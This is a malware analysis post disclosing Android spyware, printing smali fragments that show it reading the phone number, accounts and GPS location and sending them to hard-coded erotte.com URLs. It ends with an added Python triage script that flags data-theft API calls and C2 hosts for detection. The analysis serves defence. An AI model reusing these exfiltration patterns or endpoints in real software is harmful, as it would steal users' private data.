Exposing the Android Fraud #Malware Development Site

unixfreaxjp Mar 16th, 2012
I disclosed a malware development site I found in a Japanese network.
The report is here: http://goo.gl/j6pdD (English), or
http://unixfreaxjp.blogspot.com/2012/03/ocjp-026.html (Japanese)

My malware analysis / reversing result:
/*-----------------------------
GET THE SYSTEM PRIVATE DATA
-----------------------------*/

//accessing the system's sensitive data

getSystemService(Ljava/lang/String;)
getAccounts()[Landroid/accounts/Account;
invoke-virtual/range {v16 .. v16}, Landroid/telephony/TelephonyManager;
->getLine1Number()Ljava/lang/String;
Landroid/location/Location;->getLatitude()D

Lcom/example/android/service/Main;->mLocationManager:Landroid/location/LocationManager;
invoke-virtual {v0, v1}, Landroid/location/LocationManager;
->getLastKnownLocation(Ljava/lang/String;)Landroid/location/Location;

//operations for getting device data & allocating it to malware variables

Main(101)   : iget-object v0, p0, Lcom/example/android/service/Main;->dvino:Ljava/lang/String;
Main(441)   : iput-object v1, v0, Lcom/example/android/service/Main;->dvino:Ljava/lang/String;
vew2(62)    : iput-object v0, p0, Lcom/example/android/service/vew2;->dvino:Ljava/lang/String;
vew2(295)   : iput-object v0, p0, Lcom/example/android/service/vew2;->dvino:Ljava/lang/String;
vew2(304)   : iget-object v2, p0, Lcom/example/android/service/vew2;->dvino:Ljava/lang/String;
Main(61)    : iput-object v0, p0, Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
Main(123)   : iget-object v0, p0, Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
Main(415)   : iput-object v1, v0, Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
Main(483)   : iput-object v7, v0, Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
Main(604)   : iget-object v3, p0, Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
Main(51)    : iput-object v0, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;
Main(112)   : iget-object v0, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;
Main(432)   : iput-object v1, v0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;
Main(592)   : iget-object v3, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;

/*-----------------------------
HTTP COMMUNICATION CALLS
-----------------------------*/

//initial setting for the HTTP client

.local v3, method:Lorg/apache/http/client/methods/HttpGet;

//some HTTP methods used for the transaction

Lorg/apache/http/client/methods/HttpGet;-><init>(Ljava/lang/String;)V
new-instance v0, Lorg/apache/http/impl/client/DefaultHttpClient;
Lorg/apache/http/client/methods/HttpGet;->setHeader(Ljava/lang/String;Ljava/lang/String;)V
Lorg/apache/http/impl/client/DefaultHttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;
Lorg/apache/http/StatusLine;->getStatusCode()I

/*-----------------------------
SPYWARE STRING BUILDER:
-----------------------------*/

//initial variables for the stolen strings..

.field private dtnn:Ljava/lang/String;
.field private dvino:Ljava/lang/String;
.field private telno:Ljava/lang/String;
.field private m_addr:Ljava/lang/String;
.field latitude:D
.field longitude:D
.field private mLocationManager:Landroid/location/LocationManager;
.field private mVib:Landroid/os/Vibrator;
.field private timer2:Ljava/util/Timer;
.field private url:Ljava/lang/String;
.field private end_f:Ljava/lang/Integer;
.field final synthetic this$0:Lcom/example/android/service/vew2;
.field final synthetic this$0:Lcom/example/android/service/Main;
..etc..etc..

// some initial data for string operations

const-string v3, "&telno="
const-string v2, "&m_addr="
const-string v2, "&dvino="
const-string v3, "&dtnn="
const-string v1, "&url="
...etc..etc..

//the accessed data is put into the strings...

Lcom/example/android/service/Main;->mVib:Landroid/os/Vibrator;
Lcom/example/android/service/Main;->dvino:Ljava/lang/String;
Lcom/example/android/service/Main;->telno:Ljava/lang/String;
Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
Lcom/example/android/service/vew2;->mVib:Landroid/os/Vibrator;
Lcom/example/android/service/vew2n;->telno:Ljava/lang/String;

/*-----------------------------
SPYWARE - DATA SENT via HTTP:
-----------------------------*/

//Building the strings for sending.........

Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
invoke-direct {v0, v1, v2}, Landroid/content/Intent;-><init>(Ljava/lang/String;Landroid/net/Uri;)V

//URIs used for sending

const-string Uri v2, "http://erotte.com/check.php?id=",
"http://erotte.com/rgst5.php?gpsx=",
"http://erotte.com/send.php?a_id="

//sending & registering the Android location

Main$1(116) :  const-string v3, "&gpsx="
Main(610)   :  const-string v3, "&gpsx="
Main$1(134) :  const-string v3, "&gpsy="
Main(626)   :  const-string v3, "&gpsy="
vew2$1(83)  :  const-string v3, "&gpsy="
vew2(607)   :  const-string v3, "&gpsy="
const-string v3, "http://erotte.com/rgst5.php?gpsx= ....gpsy..

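The analysis above is essentially a manual triage of the smali: find calls that read private device data (phone number, accounts, GPS), find a network sink (DefaultHttpClient.execute), and find the hard-coded URL and query-string constants that tie the two together. As an added example (not part of the original paste and not the analyst's own tooling), the following Python script automates that same triage over a smali dump. The smali lines embedded in it are constructed to mimic the patterns quoted above, not copied from the sample, and the lists of API signatures and network sinks to flag are my own assumptions about what a spyware triage should look for.

```python
import re
from collections import defaultdict

# Constructed sample smali lines (NOT taken from the analysed sample) that mimic the
# patterns quoted in the analysis: sensitive-data API calls, query-string keys for
# stolen fields, and a hard-coded C2 endpoint.
SAMPLE_SMALI = """\
.class public Lcom/example/android/service/Main;
.field private telno:Ljava/lang/String;
.field private dvino:Ljava/lang/String;
invoke-virtual/range {v16 .. v16}, Landroid/telephony/TelephonyManager;->getLine1Number()Ljava/lang/String;
invoke-virtual {v0, v1}, Landroid/location/LocationManager;->getLastKnownLocation(Ljava/lang/String;)Landroid/location/Location;
invoke-virtual {v2}, Landroid/accounts/AccountManager;->getAccounts()[Landroid/accounts/Account;
const-string v2, "http://erotte.com/send.php?a_id="
const-string v3, "&telno="
const-string v3, "&gpsx="
const-string v3, "&gpsy="
new-instance v0, Lorg/apache/http/impl/client/DefaultHttpClient;
invoke-virtual {v0, v3}, Lorg/apache/http/impl/client/DefaultHttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;
"""

# Assumed list of sensitive-source methods (descriptor fragments) worth flagging.
SENSITIVE_SOURCES = {
    "Landroid/telephony/TelephonyManager;->getLine1Number": "phone number",
    "Landroid/telephony/TelephonyManager;->getDeviceId": "IMEI",
    "Landroid/accounts/AccountManager;->getAccounts": "account list",
    "Landroid/location/LocationManager;->getLastKnownLocation": "GPS location",
    "Landroid/location/Location;->getLatitude": "GPS latitude",
    "Landroid/location/Location;->getLongitude": "GPS longitude",
}

# Assumed list of network sinks: any of these lets the app push data off the device.
NETWORK_SINKS = (
    "Lorg/apache/http/impl/client/DefaultHttpClient;->execute",
    "Ljava/net/HttpURLConnection;->connect",
    "Ljava/net/URL;->openConnection",
)

CONST_STRING_RE = re.compile(r'const-string(?:/jumbo)?\s+[vp]\d+,\s+"((?:[^"\\]|\\.)*)"')
URL_RE = re.compile(r'^https?://[^\s"]+')
QUERY_KEY_RE = re.compile(r"^[?&]([A-Za-z_][A-Za-z0-9_]*)=$")


def triage_smali(text):
    """Scan disassembled smali and return a dict summarising spyware indicators."""
    report = {
        "sources": defaultdict(list),   # description -> [line numbers where it is called]
        "sinks": [],                    # line numbers of network-sink calls
        "urls": [],                     # hard-coded URL string constants, in order
        "query_keys": [],               # keys from "&name=" fragments, in order
    }
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        for sig, desc in SENSITIVE_SOURCES.items():
            if sig in stripped:
                report["sources"][desc].append(lineno)
        if any(sink in stripped for sink in NETWORK_SINKS):
            report["sinks"].append(lineno)
        m = CONST_STRING_RE.match(stripped)
        if m:
            value = m.group(1)
            if URL_RE.match(value):
                report["urls"].append(value)
            else:
                key = QUERY_KEY_RE.match(value)
                if key:
                    report["query_keys"].append(key.group(1))
    report["sources"] = dict(report["sources"])
    return report


def is_suspicious(report):
    """Heuristic: private-data sources + a network sink + hard-coded URLs = exfil candidate."""
    return bool(report["sources"]) and bool(report["sinks"]) and bool(report["urls"])


def c2_hosts(report):
    """Distinct hosts from the hard-coded URL constants, in first-seen order."""
    hosts = []
    for url in report["urls"]:
        host = url.split("://", 1)[1].split("/", 1)[0]
        if host not in hosts:
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    r = triage_smali(SAMPLE_SMALI)
    print("sources:", r["sources"])
    print("sinks at lines:", r["sinks"])
    print("C2 hosts:", c2_hosts(r))
    print("query keys:", r["query_keys"])
    print("suspicious:", is_suspicious(r))
```

On a real sample you would feed it the concatenated `.smali` files from apktool or baksmali; the query-key list then gives you the field names (telno, dvino, dtnn, gpsx, gpsy...) to trace back through `iput-object`/`iget-object` exactly as done by hand above, and the host list goes straight into a blocklist or a detection rule.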
----
Zero Day Japan | http://0day.jp
Malware Research Lab (マルウェア研究所)
Analyst: Hendrik ADRIAN (アドリアン・ヘンドリック) (VT/Google/Twitter: @unixfreaxjp)
Sponsored by: KLJ Tech Co., Ltd. (株式会社ケイエルジェイテック) http://www.kljtech.com